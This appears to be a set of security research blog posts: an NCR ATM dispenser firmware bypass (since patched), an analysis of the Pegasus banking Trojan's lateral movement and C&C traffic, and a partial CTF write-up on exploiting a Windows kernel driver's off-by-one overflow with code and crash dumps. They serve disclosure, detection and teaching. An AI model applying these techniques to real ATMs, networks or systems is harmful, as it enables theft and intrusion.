Low-level Hacking NCR ATM

Positive Research Center - 10 August 2018 - 15:00

Image credit: Sascha Kohlmann, CC BY-SA 2.0
Many of the systems that power the modern world are supposed to be beyond the reach of mere mortals. Developers naively assume that these systems will never give up their secrets to attackers and eagle-eyed researchers.

ATMs are a perfect case in point. Thefts with malware of the likes of Cutlet Maker, as well as unpublicized incidents when unknown attackers plugged in their laptop to an ATM and stole cash without leaving any system logs behind, confirm what the security community has long known. There is no such thing as a hack-proof system, merely one that has not been sufficiently tested.

Getting started

Even now, many people think that the only way to rob an ATM involves the brutest of brute force: pulling up in a pickup, attaching a hook, and pushing hard on the gas pedal, before savaging the ATM with a circular saw, crowbar, and welding kit.

But there is another way.

After a brief search on eBay, I obtained the board for an NCR USB S1 Dispenser with firmware. I had two objectives:

  • Bypass the encryption used for commands (such as "dispense banknotes") that are sent by the ATM computer via USB to the dispenser.
  • Bypass the requirement for physical access to the safe in order to complete authentication (which must be performed by toggling the bottom cassette in the safe), which is needed for generating the encryption keys for the commands mentioned above.

Firmware

The firmware is an ELF file for the NXP ColdFire processor (the Motorola 68040, my favorite CPU!) running on VxWorks v5.5.1.

There are two main sections of interest in the ELF file, .text and .data:

  • The first contains code that loops continuously most of the time (we'll call it the "main firmware") when the dispenser is connected to the system in the upper part of the ATM.
  • The second contains a zlib-compressed bootloader (locally named "USB Secure Bootloader"), which is responsible for uploading firmware and running the main code.

And best of all (for researchers, anyway), the debug symbols in the ELF file were all there and easily searchable.

Inner workings of the main firmware

We can divide the code into four main levels, from top to bottom in the hierarchy:

  1. USB Receive Thread, which accepts USB packets and distributes them to the different services.
  2. Services are the main units of execution. Each service has a particular role and corresponding tasks (classes).
  3. Classes, here, are tasks that can be performed by a particular service using controllers.
  4. Controllers are the workers that validate tasks, perform tasks, and generate result packets.

There was a lot of firmware code, so I decided to start by finding all possible services and only then trying to figure out where tasks are transferred.

Here are the services I found that were responsible for the actions of interest:

1) DispTranService (Dispenser Transaction Service): Handles encrypted commands, generates bundles of banknotes, authenticates, and much more. In short, all the interesting stuff.

2) securityService: After authentication, a session key is generated on the dispenser. When requested by the ATM computer, the session key is sent to it in encrypted form. This key is then used to encrypt all commands designated important by the vendor, such as dispensing cash and forming bundles of banknotes.

But then another service, UsbDownloadService, caught my eye. When the dispenser is connected to the computer and the firmware version on the dispenser doesn't match the version stored on the computer (in the folder with the vendor's software), this service switches the dispenser to the bootloader so that the firmware needed to work with the OS can be uploaded. This service can also report the current firmware version.

Physical authentication

Physical authentication is in fact implemented extremely well, with the mission of protecting the ATM from unauthorized USB commands. The ATM safe with cash must be open in order to perform either of the following actions:

  • Remove and insert the lower cassette.
  • Toggle the switch on the dispenser main board.

But all this is required only if the access level is set to the maximum. There are a total of three access levels: USB (0), logical (1), and physical (2). The first two are used by firmware developers for debugging and testing. The vendor, of course, strongly urges selecting the third one by default.

The vulnerability

Here I will describe a critical vulnerability (since fixed by the vendor) that, given physical access to the service zone of the ATM but not to the safe zone (such as through a hole drilled in the ATM front panel), allowed making the dispenser execute any command – even "give me cash now!"

I found that UsbDownloadService accepts commands that don't require encryption. That sounds tempting, but shouldn't Secure Bootloader prevent any further mischief, as its name implies?

Spoiler: …it doesn't!

We need to go deeper

As mentioned already, the .data section contains compressed bootloader code that initially escaped both my attention and that of my colleagues.

As long as the bootloader remained a secret, there was no way to answer the question: "How does the software on the computer upload the dispenser’s firmware?" The main firmware did not reveal any clues.

So the bootloader was unpacked and loaded into IDA at offset 0x100000, from where investigation could start… except there were no debug symbols there!

But after comparing the main firmware with the bootloader code and reading the controller datasheet, I started to get a better idea of what was happening.

Although the process of firmware uploading seemed to be secure, in reality it was not. The trick was just to upload the firmware in the right way :)

Fully understanding this process took a lot of time and dedication (details can be learned from "Blackbox is dead – Long live Blackbox!" at Black Hat USA 2018 in Las Vegas). These efforts included re-soldering NVRAM and copying the backup to it in order to unbrick the controller… and other easy-peasy stuff like that.

Thank you to my colleague Alexey for his patience!

Here is the method for uploading firmware to the dispenser:

1) Generate an RSA key pair and upload the public key to the controller.

2) Write .data and .text from the ELF in sequence to their physical addresses, taken from the section headers.

3) Calculate the SHA-1 checksum for the newly written data, encrypt that value with the private key, and send the result to the controller.

4) Calculate and send the sum of all firmware words that have been written.

At which point, if everything has been calculated and written correctly, the main firmware will boot without a hitch.

Only one restriction was found for the firmware writing process: the version of the "new" firmware cannot be less than the version of the current firmware. But there's nothing to stop you from tinkering with the firmware number in the data that you write yourself.

So my special firmware with anti-security "secret sauce" was uploaded and run successfully!

By now I had a good knowledge of the main firmware, commands used to dispense cash, and more. All that remained was to send (unencrypted) commands, which the dispenser would eagerly obey.

Cash dispensing

This successful result was a worthy intellectual (although not monetary) reward for all the travails of research, such as bricking a real ATM (oops!). My curiosity almost inspired me to try repeating this trick with another major ATM vendor.

Ultimately, a very real ATM began to whirr and spit out very not-real dummy bills (vendors' shiny equivalent of Hollywood prop money). No magic was necessary: just a laptop, brainpower, and a USB cord.

Conclusions

"Security through obscurity" is no security at all. Merely keeping code or firmware proprietary will not stop an attacker from finding a way in and taking advantage of vulnerabilities. Curiosity and an initial financial outlay are all that is required.

Just as development is best handled by developers, security should be the job of security professionals. The most productive approach for vendors is to work closely with dedicated security companies, which have teams possessing the necessary experience and qualifications to assess flaws and ensure a proper level of protection on a case-by-case basis.

Postscriptum

The vendor has confirmed the vulnerability (which was also found in the S2 model) and declared it fixed as of the February 2018 patch.

CVE listings:

  • CVE-2017-17668 (NCR S1 Dispenser)
  • CVE-2018-5717 (NCR S2 Dispenser)

Acknowledgements

Before I had even set to work on the firmware, Dmitry Sklyarov and Mikhail Tsvetkov had already discovered a lot about it (even without having a dispenser board). Their findings were of enormous assistance! And as concerns everything hardware-related, Alexey Stennikov's help was absolutely invaluable.

Author: Vladimir Kononovich, Positive Technologies

Pegasus: analysis of network behavior

Positive Research Center - 30 July 2018 - 13:19
Source code for Pegasus, a banking Trojan, was recently published online. Although the Carbanak cybercrime gang was referenced in the archive name, researchers at Minerva Labs have shown that Pegasus is actually the handiwork of a different group known as Buhtrap (Ratopak). The archive contains an overview of the Trojan, its source code, a description of Russian banking procedures, and information on employees at a number of Russian banks.

The architecture of the Pegasus source code is rather interesting. Functionality is split among multiple modules, which are combined into a single binpack at compile time. During compilation, executables are signed with a certificate from the file tric.pfx, which is missing from the archive.

The network behavior of Pegasus is no less curious. After infection, Pegasus tries to spread within the domain and can act as a proxy to move data among systems, with the help of pipes and Mailslot transport. We focused on the unique aspects of the malware's network behavior and quickly added detection signatures to PT Network Attack Discovery. Thanks to this, all users of PT NAD can quickly detect this Trojan and its modifications on their own networks. In this article, I will describe how Pegasus spreads on a network and how copies of Pegasus communicate with each other.

Basic structure

Once on a victim computer, the initial module (InstallerExe) uses process hollowing to inject code into svchost.exe. After the main modules initialize, Pegasus launches several parallel processes:

  1. Domain Replication: Gathers information about the network and tries to spread Pegasus to other Windows systems.
  2. Mailslot Listener: Listens for Mailslot broadcasts, which are used by Pegasus to send stolen credentials. The slot name is generated at compile time.
  3. Pipe Server Listener: Listens to the Windows Pipe with a name derived from the name of the computer. These pipes are used mainly to discover and communicate with other copies of Pegasus on the same network.
  4. Logon Passwords: Tries once every few minutes to dump credentials from memory with the help of a Mimikatz-based module.
  5. Network Connectivity: Responsible for interfacing with the C&C server and periodically exchanging messages.
(Comments in the source code describe these steps as: "start transports which links data with our CB-manager" and "start broadcasting creds to other machines".)

Domain Replication

This module is responsible for lateral movement on Windows networks. Movement consists of two steps:

  1. Discovering other machines on the domain.
  2. Trying to replicate Pegasus to those machines.

Discovery of other machines on the domain relies on two API calls: NetServerEnum, which requires the Browser service to work, and WNetOpenEnum/WNetEnumResource. All machines discovered on the domain are checked to determine whether they are already infected: Pegasus polls the generated pipe name more than 20 consecutive times, once every 200 milliseconds. (We flagged this strange behavior as one of the indicators of Pegasus presence.) If Pegasus does not detect any signs of infection, it proceeds to the next step: replication.

With the help of credentials found on the host, Pegasus tries to log in to the target over the SMB protocol to IPC$ and ADMIN$ shares. If IPC$ is accessible but ADMIN$ is not, Pegasus concludes that the account does not have sufficient rights and marks the credentials as invalid. After obtaining access to the ADMIN$ share, which is an alias for the %windir% folder, the malware tries to determine the machine architecture in order to pick the suitable module to apply.

This process of architecture determination is based on the headers of PE files on the machine in question. Pegasus attempts to read the first 4 kilobytes of notepad.exe in the %windir% folder. One subtle drawback of this method is that on Windows Server 2012, notepad.exe is located at the path %windir%\System32.

Location of notepad.exe on Windows 7:

C:\Users\Administrator>where notepad.exe

Location of notepad.exe on Windows Server 2012:

C:\Users\Administrator>where notepad.exe

If notepad.exe is not found, Pegasus cannot infect the server, even if it has credentials for an account with the necessary rights. So the simple absence of Notepad in %windir% can stop Pegasus from spreading on Windows Server 2012. Using regedit.exe would have been a more surefire way of accomplishing this task.

After determining the architecture of the target server, Pegasus downloads a small (~10 kilobytes) Remote Service Exe (RSE) dropper. The dropper's purpose is to download binpack, which contains the payload modules, via a pipe in cleartext and hand off control to the Shellcode module. The name of the dropper is generated pseudorandomly and consists of 8 to 15 hexadecimal characters. The pseudorandom generator uses the name of the target machine as a seed and ensures that the name will be identical across restarts, in order to avoid littering %windir% with multiple copies.

After a check of the dropper’s integrity and making sure that the dropper has not been deleted by antivirus protection, an attempt is made to run the dropper via the Windows Management Instrumentation (WMI) mechanism. Service Control Manager (SCM) can also be used, but the malware prefers the first method because SCM leaves more traces in Windows logs. Code suggests plans by the creators of Pegasus to implement other replication methods: WSH Remote, PowerShell Remoting, and Task Scheduler. A module for running commands via RDP was under development as well.

As mentioned already, once launched the dropper successfully checks and starts listening to a pipe before handing off control to the payload that arrives.

Since Pegasus code is injected via process hollowing into the svchost.exe process, the victim disk will not retain any copy of the initial module InstallerExe (if infection started with the machine in question) or of the RSE dropper (in the case of replication). If the dropper is still accessible at a known path, Pegasus deletes it as follows:

  1. Overwrites the file contents with random data.
  2. Overwrites the file again, this time with empty data (zeroes).
  3. Renames the file.
  4. Deletes the file.

If infection is successful, Domain Replication begins again.

Mailslot

When Pegasus obtains credentials from another copy of Pegasus or from the mod_LogonPasswords module, the malware starts broadcasting the credentials on the domain. Broadcasting is performed using the Mailslot mechanism, which is based on SMB and allows sending one-way broadcasts of small portions of data to systems on the domain. The slot names are randomly generated. In order for all infected machines on the domain to send and receive data with the same slot name, the pseudorandom name generator is initialized from the variable TARGET_BUILDCHAIN_HASH, which is set in the configuration during build.

Since Mailslot imposes an upper limit on packet size, only one set of credentials is broadcast at a time. Among all available domain credentials, the set that was broadcast longest ago (that is, the one with the oldest last-broadcast time) is chosen.

Mailslot data is not sent in cleartext, but instead wrapped in three layers of XOR encryption, the keys for which are transmitted together with the data. The first layer is NetMessageEnvelope with an SHA1 integrity check, which is used for all data sent on the local network. The key is contained in 4 bytes in the beginning of the packet, and shifts 5 bits to the right per cycle. Inside is an XOR-encrypted data structure with fields for credentials and their date of addition. The beginning of the structure contains an 8-byte key, but no shifting is applied. After decoding the structure of the credentials, all that remains is to deserialize individual fields from ENC_BUFFER structures such as computer name, domain name, username, and password. These fields are encrypted with an 8-byte key with shifts. A sample Mailslot packet and script for decrypting it are available: script, PCAP.

In the release version of the malware, Mailslot messages are sent at an interval between 20 seconds and 11 minutes.

// some random wait before making next step
DbgPrint("going to sleep");
#ifdef _DEBUG
// debug - 2-5 s
Sleep(rg.rgGetRnd(&rg, 2000, 5000));
#else
// release - 20 - 650 s
//Sleep(rg.rgGetRnd(&rg, 2000, 65000) * 10);
Sleep(rg.rgGetRnd(&rg, 2000, 15000));
#endif

Besides providing credentials, Mailslot messages also announce Internet access and help to find other infected computers that have such access. NetMessageEnvelope indicates the type of message inside. Pipes make it possible for Internet-connected computers to communicate with computers that are not connected to the Internet.

Pipes

Pegasus uses pipes for two-way communication and sending large amounts of data. Although the name of each pipe is generated by a pseudorandom generator, it also depends on the machine name and build, which allows the Pegasus client and server to use the same name.

During one-way communication (such as when sending binpack during replication to another computer), data is sent unencrypted. At the beginning of binpack is the structure SHELLCODE_CONTEXT, which is 561 bytes long.

Two-way communication—say, when proxying data between a Pegasus copy with Internet access and a C&C server—makes use of the same NetMessageEnvelope structure with XOR encryption as we already saw with Mailslot. This is possible because the structure enables differentiating different message types based on the id field.

When data is being proxied, a query for data is sent (PMI_SEND_QUERY), the query ID is received, and the status of the query can be checked by its ID (PMI_CHECK_STATUS_QUERY). In most cases, the payload will be yet another Envelope structure, which adds features and another layer of encryption.

These pipes can do more than just help infected machines to communicate. The module mod_KBRI_hd injects cmd.exe processes with code that intercepts MoveFileExW calls and analyzes all copied data, since this is a part of the bank payment mechanism. If the copied file contains payment data of interest to the attackers, a notification is sent to the C&C server. The mod_KBRI module, injected into cmd.exe, communicates with Pegasus on an infected machine via a pipe whose name is not generated, but rather hard-coded.


Module functionality also includes the ability to replace payment information on the fly using a template. Example search patterns are shown in the screenshot.

C&C traffic

Data exchange with the C&C server is handled by a separate stream that, every few minutes, checks the queue of data chunks from internal processes or other copies of Pegasus and sends them to the server.

During initialization of the mod_NetworkConnectivity module, the presence of a network connection is tested in several steps:

1) Detection of proxy server settings and an attempt to connect through them. The settings are obtained:

  • In the Registry branch \\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
  • Via WPAD (WinHttpGetProxyForUrl call)
  • Via the proxy server configuration for the current user (WinHttpGetIEProxyConfigForCurrentUser call)

2) Verification of connection with Microsoft update servers and of the data returned from the servers (authrootseq.txt, rootsupd.exe)

3) Testing of HTTPS connections with one of the following addresses:


Only if all these checks are passed does Pegasus consider an external network to be accessible, after which it announces this fact on the domain via a Mailslot message. For stealth, Pegasus communicates with the C&C server only during working hours (9:00 a.m. to 7:00 p.m. local time).

Data chunks, wrapped in an envelope with checksum, are sent with DES encryption in CRYPT_MODE_CBC/PKCS5_PADDING mode. The encryption key is derived entirely from a variable that is set at compile time, meaning that we can decrypt traffic between Pegasus and the C&C server so long as we know the value of BUILDCHAIN_HASH. In the source code in the archive in question, this variable was equal to 0x7393c9a643eb4a76. A sample packet and script for decrypting the server check-in are available for download: GitHub, PCAP.

This content (in the INNER_ENVELOPE structure) is sent to the C&C server during check-in or together with other data. The beginning of it contains 28 bytes of envelope with a field for the length and SHA1 checksum.

When proxied via pipes between machines, the same data is sent, but wrapped in the NetMessageEnvelope we have already discussed, plus the checksum and XOR encryption.

The C&C operator can send execution commands to Pegasus copies. Messages with commands or other data, such as EID_CREDENTIALS_LIST, can contain their own layers of encryption for fields, as we already saw with broadcasting of stolen credentials.

Detection

Our attention focused on how to detect Pegasus activity on networks. After carefully studying source code and running the malware in a test environment, we were able to create a list of network anomalies and artifacts that clearly indicate the presence of this sophisticated threat.

It would be fair to call Pegasus versatile: it actively uses the SMB protocol to send messages and communicate with other copies. The methods used for replication and C&C interaction are also distinct. Pegasus copies establish a peer-to-peer network on the domain, building a path to the Internet and communicating with C&C servers by means of traffic proxying. Certificate signing of executables and use of Microsoft and Mozilla sites for verifying connection access complicate attempts to detect Pegasus activity and discover infected hosts.

The Pegasus source code is relatively well structured and commented, making it likely that other threat actors will copy or "borrow" code for their own malware.

Many of the mechanisms for remotely running commands and searching for credentials remain unimplemented. Among the developers' unrealized plans was the ability to modify shellcode on the fly during process injection.

We have developed several signatures for PT NAD and the Suricata IDS suitable for detecting Pegasus-specific activity at various stages, within the very first seconds of presence. Public signatures for Suricata are available from our company on GitHub and Twitter, and will automatically be added to Suricata if you use the suricata-update mechanism.

You can view detections with Pegasus signatures in the following screenshot. This view is taken from PT Network Attack Discovery, our product for incident detection and forensic investigation:

In addition, here are some useful indicators of compromise (IoC):



Author: Kirill Shipulin, @attackdetection team, Twitter | Telegram

Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)

j00ru//vx tech blog - 18 July 2018 - 13:23

During the weekend of 6-8th of July, our CTF team – Dragon Sector – played in an invite-only competition called WCTF, held in Beijing. The other participants were top-tier groups from around the world (e.g. Shellphish, ESPR, LC↯BC or Tokyo Westerns), and the prize pool of the contest was a stunning $100,000 USD. One particularly unique rule of the CTF was that the challenges were prepared by the teams themselves and not the organizers. Each of the 10 teams was obligated to provide two tasks, at least one of which had to run on Windows. This meant that each team could capture a maximum of 18 flags set up by the other teams in the room. In practice, the structure of the contest incentivized submitting extremely difficult and complex challenges. Remote help was allowed, and the scoring system offered first blood bonus points for being the first, second and third team to solve a task. The hacking part of the event was followed by a soft part, where additional points were granted by a jury and the participants for presenting one’s own tasks on stage.

After two days of tough competition, we came out as the runner-up of the CTF with 6/18 tasks solved, behind the winner – Tokyo Westerns (7/18 tasks):

My contribution to the above result was a flag for the “Searchme” task authored by Eat, Sleep, Pwn, Repeat. It involved the exploitation of an off-by-one buffer overflow of a PagedPool allocation made by a vulnerable kernel driver loaded in Windows 10 64-bit. Shortly after the CTF, the original author (@_niklasb) published the source code of the driver and the corresponding exploit (see niklasb/elgoog on GitHub and discussion on Twitter), which revealed that my solution was partially unintended. Niklas used the off-by-one to corrupt allocation metadata and performed some pool feng-shui to get overlapping pool chunks. On the other hand, I achieved a similar outcome through a data-only attack without touching any pool metadata, which made the overall exploitation process somewhat simpler. I encourage you to closely analyze Niklas’ exploit, and if you’re interested in my approach, follow along.

If you want to jump straight to the exploit code, find it on GitHub.

Initial recon

As a part of the task, we were provided with a 64-bit Windows kernel driver called searchme.sys consuming 14 kB of disk space, and the following description:

<ip> 3389 flag is here: c:\flag.txt, User:ctf, password:ctf

When I connected to the remote host via RDP, I could log in as a regular “ctf” user. The searchme.sys driver was loaded in the system, and the desired C:\flag.txt file was found on disk, but it couldn’t be read from the security context of the current user, as expected:

At this point, it was quite clear that the goal of the challenge was to exploit a kernel-mode vulnerability in searchme.sys to elevate privileges to administrative or system rights, and then read the flag from the protected file. When I loaded the module in IDA Pro, I quickly learned that it registered a device under \Device\Searchme and handled four IOCTLs using the Buffered I/O communication scheme:

  • 0x222000 – allocates an empty object from PagedPool, saves it in a global array and returns its address to the caller,
  • 0x222004 – frees a previously allocated object,
  • 0x222008 – adds a pair of (char[16], uint32) to an existing object,
  • 0x22200C – transforms an existing object of type-0 to type-1 in a one-way, irreversible manner.

As IOCTLs #1 and #2 were trivial, the vulnerability had to lurk somewhere in the implementation of #3 or #4. I briefly reverse-engineered the entire code found in the driver (with the help of Redford and implr) to get a grasp of its functionality, rename symbols and fix data types. It was clear that the driver maintained a hash map associating textual strings with lists of numeric values, and that some type of binary data structure was involved in type-1 objects, but I still didn’t fully understand the underlying purpose of the code (it later turned out to be binary interpolative code). I didn’t observe any obvious vulnerabilities either, but I noticed two suspicious behaviors:

  1. In the handling of 0x222008, the driver wouldn’t allow duplicates within the list of integers associated with a string token. However, it only checked the newly added value against the one at the back of the list. For example, a [1,2,2] list wouldn’t be allowed due to the equal consecutive numbers, but [2,1,2] could be created just fine. This seemed especially odd considering that the list was sorted later on when being processed by another IOCTL, potentially nullifying the whole point of the duplicate detection.
  2. In nested functions called by the 0x22200C handler, the following code construct was found: if (*cur_buf > buf_end) { return 1; }

    Assuming that buf_end was the smallest address beyond the valid buffer, this could indicate an off-by-one error, as the comparison should otherwise use the >= operator.

Since following the leads discussed above could be time consuming, I decided to try an easier route and see if I could trigger any crashes through dumb fuzzing. This would allow me to start my analysis from a known bad state, instead of spending time on searching for memory corruption primitives in the first place.

Fuzzing the driver

In the context of fuzzing, it was convenient that the communication interface of the driver was limited to four simple operations. During the development stage, I created several wrapper functions around DeviceIoControl which were later reused in the actual exploit. The fuzzer was very simple in its core – it infinitely invoked one of the IOCTLs with random, but correctly formatted input arguments (token=["aa","bb"], value=[0..9]).

After enabling Special Pool for searchme.sys and starting the fuzzer, it only took a few seconds to see the following crash in WinDbg:

DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on the
bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ffffd9009c68b000, memory referenced
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation
Arg3: fffff8026b482628, if non-zero, the address which referenced memory.
Arg4: 0000000000000000, (reserved)

[...]

TRAP_FRAME:  ffff820b43580360 -- (.trap 0xffff820b43580360)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=ffffd9009c68b000 rbx=0000000000000000 rcx=00000000fffffffe
rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8026b482628 rsp=ffff820b435804f8 rbp=0000000000000000
 r8=ffffd9009c68b000  r9=0000000000000000 r10=00007ffffffeffff
r11=ffff820b435804f0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
searchme+0x2628:
fffff802`6b482628 0fbe00  movsx eax,byte ptr [rax] ds:ffffd900`9c68b000=??

The crash occurred at searchme+0x2628, which belongs to a bit-writing function – the same that contains the suspicious *cur_buf > buf_end comparison. Further analysis and experiments (e.g. fuzzing without Special Pool) confirmed that the overflow was indeed limited to a single byte.

At that moment, a light bulb went off in my head – I had already seen similar code not so long ago! After a quick check, it turned out to be true; the “searchme” task was in fact a slightly modified and recompiled version of elgoog2 from 34C3 a few months ago. The immediate benefit of the discovery was that the “elgoog” task came with debugging symbols, including structure definitions, function names and so on. After doing a bit more recon, I found this tweet, which led to this short write-up and an exploit by shiki7 of Tea Deliverers. The unintended type confusion bug was patched in “searchme” so the old exploit no longer worked, but it still provided some valuable insight. Additionally, Niklas’ description of the pool buffer overflow in point (1) reinforced my belief that this was the intended bug to be exploited here.

And so, I spent the next hour or two moving the symbols from “elgoog” to my “searchme” IDA database.

Controlling the overflow

Upon looking into the series of commands sent by the fuzzer to trigger the crash, I learned that the overflow was indeed caused by “compressing” (IOCTL 0x22200C) an object containing a token with duplicate entries. Since I could only write one byte beyond the allocated buffer, it was likely that its value would need to be carefully controlled. Even with the help of debug symbols, I was still unsure what data structure was constructed by the code, and hence – how to precisely control its contents.

To avoid wasting time on an in-depth examination of the algorithm, I shamelessly copy-pasted the interpolative_size and write_interpolative functions (together with their dependencies) from the Hex-Rays decompiler to Visual Studio, and wrote a simple brute-force program around it, to test the overflow byte for various random input lists. The gist of the tool boils down to the following:

// Fill input_buffer with random numbers and sort it.
memset(output_buffer, 0xaa, sizeof(output_buffer));

char *buf = output_buffer;
write_interpolative(&buf, input_buffer, 1, ARRAYSIZE(input_buffer) - 1);

size_t calculated =
    (interpolative_size(input_buffer, 1, ARRAYSIZE(input_buffer) - 1) + 7) / 8;
ptrdiff_t written = buf - output_buffer - 1;

if (written > 0 && calculated > 0 && written > calculated) {
  const char kSearchedByte = 0;
  if (output_buffer[calculated] == kSearchedByte) {
    // Print input_buffer.
  }
}

Depending on the desired value, the length of input_buffer and the range of input numbers can be manipulated. For a simple value of 0x00, the desired effect can be achieved with just five numbers in the [0..9] range:

C:\> brute.exe
calculated: 4, written: 11, last byte: 0x00
input_buffer = {0, 1, 1, 1, 2}
calculated: 1, written: 4, last byte: 0x00
input_buffer = {0, 3, 4, 5, 5}
calculated: 1, written: 4, last byte: 0x00
input_buffer = {5, 7, 8, 9, 9}
[...]

With the ability to choose the single byte overflowing our allocation, it was time to lift the primitive to a more powerful one.

Data-only pool corruption

Most dynamic allocators used today place metadata in front of the allocated memory chunks, which has historically facilitated a number of generic heap exploitation techniques. On the other hand, it may currently make the exploitation of small overflows difficult, as metadata separates application-specific objects from each other, and it is often subject to extensive integrity checks. It is obligatory to make the following two references here: A Heap of Trouble: Breaking the Linux Kernel SLOB Allocator (Dan Rosenberg, 2012) and The poisoned NUL byte, 2014 edition (Chris Evans and Tavis Ormandy, 2014).

In his intended solution, Niklas also used pool metadata corruption to confuse the kernel pool allocator, and consequently have two distinct objects overlap with each other to achieve a more useful primitive. This is a valid approach, but it requires the exploit writer to be conscious of the inner workings of the allocator, and to precisely set up the pool layout to guarantee reliable exploitation. As a personal preference, I find it easier to attack program-specific objects than internal system structures, so I intuitively started looking for options to solve the challenge this way.

It may be a little known fact that in the Windows kernel, small allocations (fitting into a single memory page) are handled differently than large ones. For somewhat dated but still relevant details, see Kernel Pool Exploitation on Windows 7 (Tarjei Mandt, 2011) and Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool (Alex Ionescu, 2014). In this specific case, we are interested in two properties of large pool chunks:

  • Metadata is stored separately, so allocations start at page-aligned addresses such as 0xffffa803f5892000.
  • The chunks are often adjacent in memory; e.g. two consecutive allocations of size 0x1000 may be mapped to addresses 0xffffa803f5892000 and 0xffffa803f5893000, respectively.

In the vulnerable driver, we can accurately control the size of the overflown chunk up to a size of 0x10000 (16 pages). This is more than enough to allocate two large objects next to each other, and we can even determine the exact pairs of adjacent areas thanks to the fact that the IOCTLs explicitly return the kernel-mode addresses of the created objects. This was successfully confirmed by a simple tool I wrote during the CTF, which created eight 0x2000-byte long indexes and compared their addresses. The output was similar to the following:

C:\>adjacent.exe
[+] Source Index: ffffa803f2f79cb0
[1] Adjacent objects: ffffa803f61db000 --> ffffa803f61dd000
[2] Adjacent objects: ffffa803f61dd000 --> ffffa803f61df000
[3] Adjacent objects: ffffa803f61df000 --> ffffa803f61e1000
[4] Adjacent objects: ffffa803f61e1000 --> ffffa803f61e3000
[5] Adjacent objects: ffffa803f61e3000 --> ffffa803f61e5000
[6] Adjacent objects: ffffa803f61e5000 --> ffffa803f61e7000
[7] Adjacent objects: ffffa803f61e7000 --> ffffa803f61e9000

As you can see, all objects were in fact mapped next to each other in a continuous block of 0x10000 bytes. If we subsequently free every other object to create “holes” in the pool, and promptly allocate a new chunk of the same size that gets overflown by the driver, the overflow should overlap with the first byte of the adjacent index object. This is illustrated below:
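The grooming sequence can be modelled with a toy first-fit allocator (my own assumption about allocation order, made purely for illustration; the real kernel pool is considerably more complex):

```c
/* A toy first-fit model of the large-pool grooming step. We allocate 8
 * contiguous page-aligned slots, free every other one to punch holes,
 * then allocate the to-be-overflown chunk. Under first-fit it lands in
 * the first hole, directly in front of a surviving index object whose
 * first byte the one-byte overflow will then corrupt. */
#define SLOTS 8
static int used[SLOTS];

static int alloc_slot(void) {
  for (int i = 0; i < SLOTS; i++)
    if (!used[i]) { used[i] = 1; return i; }
  return -1;
}

static int groom(void) {
  for (int i = 0; i < SLOTS; i++) alloc_slot();   /* 8 adjacent objects  */
  for (int i = 0; i < SLOTS; i += 2) used[i] = 0; /* free every other    */
  return alloc_slot();                            /* overflown chunk:    */
}                                                 /* slot N, with slot   */
                                                  /* N+1 still occupied  */
```

Under the first-fit assumption, the victim chunk occupies slot 0 and the object at slot 1 remains allocated right behind it.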

At this point, we should look at the type of information stored in the first byte of the allocation. As it turns out, it is the least significant byte of a 32-bit integer indicating the type of the object (type 0 – regular, type 1 – compressed). The structure of the regular object is defined as shown below:

struct _inverted_index {
  /* +0x00 */ int compressed;
  /* +0x08 */ _ii_token_table *table;
};

If the compressed member is non-zero, the layout of the structure is quite different:

struct _compressed_index {
  /* +0x00 */ int compressed;
  /* +0x04 */ int size;
  /* +0x08 */ int offsets[size];
  /* +0x?? */ char data[...];
};

Thanks to the fact that the type of the object is either 0x00000000 or 0x00000001, our one-byte overflow enables us to change the type of the object from compressed_index to inverted_index. The type confusion has some handy primitives – in the structures above, we can see that the table pointer at offset 8 overlaps with the items of offsets[0] and offsets[1]. The values in the offsets array are offsets of compressed data relative to the compressed index, and thus they are relatively small. In our testing, they were equal to 0x558 and 0x56C, respectively.

When combined and interpreted as a 64-bit address, these two values form the following pointer: 0x0000056c00000558. It is not a typical address often observed in regular applications, but nevertheless it is a canonical user-mode address that can be mapped by the program using a simple VirtualAlloc call. In other words, the type confusion allows us to redirect a sensitive kernel-mode pointer to user space, and get complete control over the _ii_token_table structure used by the driver.
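The reinterpretation of the two adjacent 32-bit offsets as one little-endian 64-bit pointer can be sketched as follows (using the 0x558 and 0x56C values observed in testing):

```c
#include <stdint.h>

/* After the type confusion, the 8 bytes at offset 8 of the object are
 * read as the `table` pointer of _inverted_index, but they actually hold
 * offsets[0] and offsets[1] of _compressed_index. On a little-endian
 * system the first dword becomes the low half of the pointer and the
 * second dword the high half. */
static uint64_t as_pointer(uint32_t offset0, uint32_t offset1) {
  return ((uint64_t)offset1 << 32) | offset0;
}
```

With offsets[0] = 0x558 and offsets[1] = 0x56C, the confused code dereferences 0x0000056c00000558 – a canonical, mappable user-mode address.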

If we implement the discussed logic in a proof of concept program to change the type of an object from 1 to 0, and then try to add a new (keyword, value) pair to the corrupted index, we should observe the following system crash while searchme.sys tries to dereference memory from 0x0000056c00000558:

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff8008b981fea, Address of the instruction which caused the bugcheck
Arg3: ffff948fa7516c60, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.

[...]

CONTEXT:  ffff948fa7516c60 -- (.cxr 0xffff948fa7516c60)
rax=000000009b82a44c rbx=ffffcc8a26af7370 rcx=0000056c00000558
rdx=0000000000000000 rsi=ffffcc8a273fc20c rdi=ffff948fa75177d4
rip=fffff8008b981fea rsp=ffff948fa7517650 rbp=ffffcc8a2876fef0
 r8=0000000000000001  r9=0000000000000014 r10=0000000000000000
r11=0000000000000000 r12=ffffcc8a2876fef0 r13=ffffcc8a29470180
r14=0000000000000002 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
searchme+0x1fea:
fffff800`8b981fea 48f77108        div     rax,qword ptr [rcx+8] ds:002b:0000056c`00000560=????????????????

Let’s take a closer look at the capabilities provided by the controlled _ii_token_table structure.

Getting a write-what-where condition

